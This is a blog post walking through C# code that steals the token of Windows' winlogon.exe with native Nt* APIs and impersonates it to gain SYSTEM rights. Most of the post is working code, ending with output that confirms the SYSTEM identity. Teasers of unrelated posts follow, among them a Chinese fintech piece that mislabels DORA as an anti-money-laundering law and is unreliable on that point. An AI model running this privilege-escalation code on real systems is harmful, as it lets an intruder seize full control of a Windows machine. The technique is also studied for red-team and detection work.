Using C# to steal tokens and gain system permissions

Intro

Grzegorz Tworek recently published some C code demonstrating how to steal and impersonate Windows tokens from a process. The standard way to do this is with the OpenProcess, OpenProcessToken, DuplicateTokenEx, and ImpersonateLoggedOnUser APIs. Grzegorz shows how to achieve the same using Nt* APIs, specifically NtOpenProcess, NtOpenProcessToken, NtDuplicateToken, and NtSetInformationThread.

Because I’m a C# junky, I ported part of his code. This post will serve as a short walkthough on how to“getsystem”by stealing and impersonating the token of a SYSTEM process. The high-level steps are:

Obtain a handle to the target process.
Obtain a handle to that target’s process token.
Duplicate the target’s process token.
Apply that duplicated token to our calling thread.
Close all obtained handles.

NtOpenProcess

A common process to target is the Windows log-on application, .winlogon.exe

// find a winlogon process
// there may be more than 1 if multiple users are logged on
using var winlogon = Process.GetProcessesByName("winlogon").First();

HANDLE hProcess;

var oa = new OBJECT_ATTRIBUTES();
var cid = new CLIENT_ID
{UniqueProcess = new HANDLE((IntPtr)winlogon.Id)
};

// open handle to winlogon
NtOpenProcess(
    &hProcess,
    PROCESS_QUERY_LIMITED_INFORMATION,
    &oa,
    &cid);

NtOpenProcessToken

Use the process handle to obtain the process’thread token.

HANDLE hToken;

// open handle to winlogon's process token
NtOpenProcessToken(
    hProcess,
    TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE,
    &hToken);

NtDuplicationToken

Before being able to duplicate the token, create a new struct.SECURITY_QUALITY_OF_SERVICE

var qos = new SECURITY_QUALITY_OF_SERVICE
{Length = (uint)Marshal.SizeOf<SECURITY_QUALITY_OF_SERVICE>(),
    ImpersonationLevel = SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
    ContextTrackingMode = 1,    // SECURITY_DYNAMIC_TRACKING
    EffectiveOnly = false
};

And a new struct which points to .OBJECT_ATTRIBUTESSECURITY_QUALITY_OF_SERVICE

oa = new OBJECT_ATTRIBUTES
{Length = (uint)Marshal.SizeOf<OBJECT_ATTRIBUTES>(),
    SecurityQualityOfService = &qos
};

Now duplicate the token.

HANDLE hDupToken;

NtDuplicateToken(
    hToken,
    MAXIMUM_ALLOWED,
    &oa,
    SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
    TOKEN_TYPE.TokenImpersonation,
    &hDupToken);

NtSetInformationThread

Once the token has been duplicated, apply it to our own process’thread. Note that or is a pseudo-handle.-20xfffffffffffffffe

var hCallingThread = new HANDLE((IntPtr)(-2));

// set current thread
NtSetInformationThread(
    hCallingThread,
    THREAD_INFORMATION_CLASS.ThreadImpersonationToken,
    &hDupToken,
    (uint)Marshal.SizeOf<HANDLE>());

GetTokenInformation

We can go a step further to validate that the token was applied by calling on our own process to obtain a handle to its thread token. This can be passed to , specifying the information class. This will return a structure which contains a pointer to the SID of the token’s user.NtOpenThreadTokenGetTokenInformationTokenUserTOKEN_USER

HANDLE hThreadToken;

NtOpenThreadToken(
    hCallingThread,
    TOKEN_QUERY,
    false,
    &hThreadToken);

uint returnLength;

GetTokenInformation(
    hThreadToken,
    TOKEN_INFORMATION_CLASS.TokenUser,
    null,
    0,
    &returnLength);

// allocate buffer
var buffer = Marshal.AllocHGlobal((int)returnLength);

GetTokenInformation(
    hThreadToken,
    TOKEN_INFORMATION_CLASS.TokenUser,
    buffer.ToPointer(),
    returnLength,
    &returnLength);

// read token user
var lpTokenUser = (TOKEN_USER*)buffer.ToPointer();

// translate to nt account
var identity = new SecurityIdentifier((IntPtr)lpTokenUser->User.Sid.Value)
    .Translate(typeof(NTAccount));

// free buffer
Marshal.FreeHGlobal(buffer);

Console.WriteLine($"Thread token: {identity.Value}");

This prints:

Thread token: NT AUTHORITY\SYSTEM

Cleaup

Just close handles.

NtClose(hProcess);
NtClose(hToken);
NtClose(hDupToken);

Conclusion

Grzegorz goes into a little more detail by calling to ensure that certain privileges are enabled within the current process. I skipped over this step because I assume they’re already enabled by default when running in a high-integrity process. I certainly encourage you to read Grzegorz’s original code: https://github.com/gtworek/PSBits/blob/master/Misc/TokenStealWithSyscalls.c.NtAdjustPrivilegesToken

All of the methods, structs, and enum’s etc used within this post can be found GitBook, pinvoke.dev.

Everything is an Object in Python: From Beginner to “Wait, What?!” Level

Hello Python learners and curious developers! You’ve probably come across this popular saying in the programming world: “Everything is an object in Python.” It sounds almost mystical, right? Well, it kind of is this concept is one of the core reasons Python is so flexible and powerful. So, fasten your seatbelt! This post will take...

Opinion: Europe can regulate its way to a better fintech future

Crypto crashes, money laundering, and digital fraud — the EU’s financial watchdogs have had enough. Regulatory bodies need to keep up by rolling out tighter regulations aimed at strengthening consumer protections and stabilising the market. As EU lawmakers scramble to protect consumers, others worry they are smothering growth. Case in point: in 2024, the FCA fined HSBC...

How to disable SIP System Integrity Protection on Mac

How to disable SIP (System Integrity Protection) on Mac Starting with OS X El Capitan, Apple added System Integrity Protection (SIP) to protect system files and directories from accidental or malicious modification. While this is beneficial for system security, it’s sometimes necessary to disable it for specific modifications. Here’s how to disable SIP on a Mac: What...

观点：欧洲可以通过监管实现更美好的金融科技未来

加密货币崩盘、洗钱和数字欺诈——欧盟金融监管机构已经受够了。监管机构需要跟上步伐，推出更严格的监管措施，以加强消费者保护并稳定市场。欧盟立法者忙于保护消费者权益之际，另一些人担心他们正在扼杀经济增长。例如：2024 年，英国金融行为监管局（FCA）因未能妥善处理陷入财务困境的客户而对汇丰银行处以 620 万英镑的罚款。监管机构正在维护公众利益，但如果限制措施更宽松，汇丰银行是否会为其客户提供更有创意的解决方案，例如嵌入个性化、数据优先的贷款服务？银行一直不敢探索创新型嵌入式贷款解决方案，因为这些方案面临正式执法行动的可能性要高出 15%。然而，2024 年 8 月，汇丰银行认为，这些好处值得他们为合规问题而战。一些人认为监管会阻碍创新——由于监管力度加大，企业不愿在运营方面进行投资——但另一些人则认为，加强监管将促进创新，并将监管视为其增长的关键驱动力。那么，谁说得对呢？解析欧盟近期金融科技法规最近，欧盟出台了一些新法规，对金融科技产生了重大影响。《反洗钱法》（DORA）于 2025 年 1 月实施，要求欧盟设立的金融机构（FI）实施流程和架构，以协助其应对和恢复与信息通信技术（ICT）相关的中断，从而增强其数字化韧性。此外，《反洗钱法》（AMLA）的出台，旨在增强各国政府打击洗钱的信心。《反洗钱法》（DORA）和《反洗钱法》（AMLA）将适用于所有金融机构及其产品和流程，但加密货币不在其适用范围之内。这正是 MiCA 的用武之地。MiCA 于 2024 年 12 月推出，旨在保护个人加密货币用户。欧盟的监管议程——尤其是在引入 MiCA、DORA 和 AMLA 之后——旨在加强监管。然而，这也是一项更广泛战略的一部分，旨在简化和协调监管，为整个欧盟金融市场提供稳定。最新的裁决在安抚消费者和监管机构与减轻受监管金融机构的负担之间取得了微妙的平衡。一套新的法规似乎与欧盟委员会 1 月份发布的《竞争力指南》相矛盾，该指南包含简化和有效实施欧盟法律的举措。然而，这些法律旨在用统一的欧盟框架取代各自为政的国家规则，使合规工作更加清晰、快捷、可预测。随着数字金融生态系统的持续加速发展，MiCA、DORA 和 AMLA 构成了一个全面的框架。它们共同致力于在整个金融科技领域平衡创新与金融稳定、消费者保护和安全。这些更新会支持还是减缓金融科技和银行业的创新？答案取决于视角。近期欧盟法规可能会在短期内减缓创新，尤其是对银行等规模较大、实力雄厚的金融机构而言，但未来前景看起来更加光明。这些新规旨在支持长期稳定。由于这三项法规要求各成员国全面协调，其制定旨在减少碎片化和监管套利。更大、更统一的市场将鼓励金融科技公司及相关服务提供商开展跨境活动、创新并增强竞争力。这些法规还支持打造更优质、更透明的产品和服务，有助于提升消费者和监管机构的信任，最终提升客户采用率。简而言之，这种环境将为规模较小、更敏捷的金融科技公司提供更大的机会，使其能够扩大规模并参与长期竞争。对于消费者和企业而言，遵守最新法规将带来更可靠、更具韧性的服务，而这对于数字支付和贷款等基本功能至关重要。这些新规营造了公平的竞争环境，鼓励传统银行和金融科技公司在创新和服务质量方面展开竞争，而非仅仅在监管优势上。此外，稳定安全的金融体系提升了欧盟作为数字金融服务中心的吸引力，这将有助于欧盟比美国更吸引新的投资者和创新。为了满足这些新标准需要进行哪些投资？需要在治理和合规架构方面进行额外投资。规模更大、更成熟的企业可能难以在其繁杂的流程和产品中实施所需的监管变革。那些拥有现有合规和治理流程的企业可能会发现过渡更加顺畅，而规模较小的金融科技企业可能需要从头构建这些流程。实施这些流程的成本是一个潜在的障碍。对于金融科技初创企业和其他小型企业而言，合规往往是一项重大挑战。他们需要投入知识，包括如何将监管要求正确地融入到流程和产品设计中，并将其转化为运营业务流程。除此之外，企业还需要在技术方面进行投资，因为企业必须满足客户在透明度和语言方面的要求。例如，更严格的反洗钱 (AML) 要求将要求企业改进“了解你的客户”(KYC) 和交易监控工具。...

How to solve the problem that the Mac application prompts that it is damaged and cannot be opened

Solution to the problem that Mac application prompts “damaged” and cannot be opened When downloading an app on your Mac, you might get an error message saying “XXX is damaged and cannot be opened,” preventing you from using the app properly. This is usually because there’s a problem with the app’s signature information during the...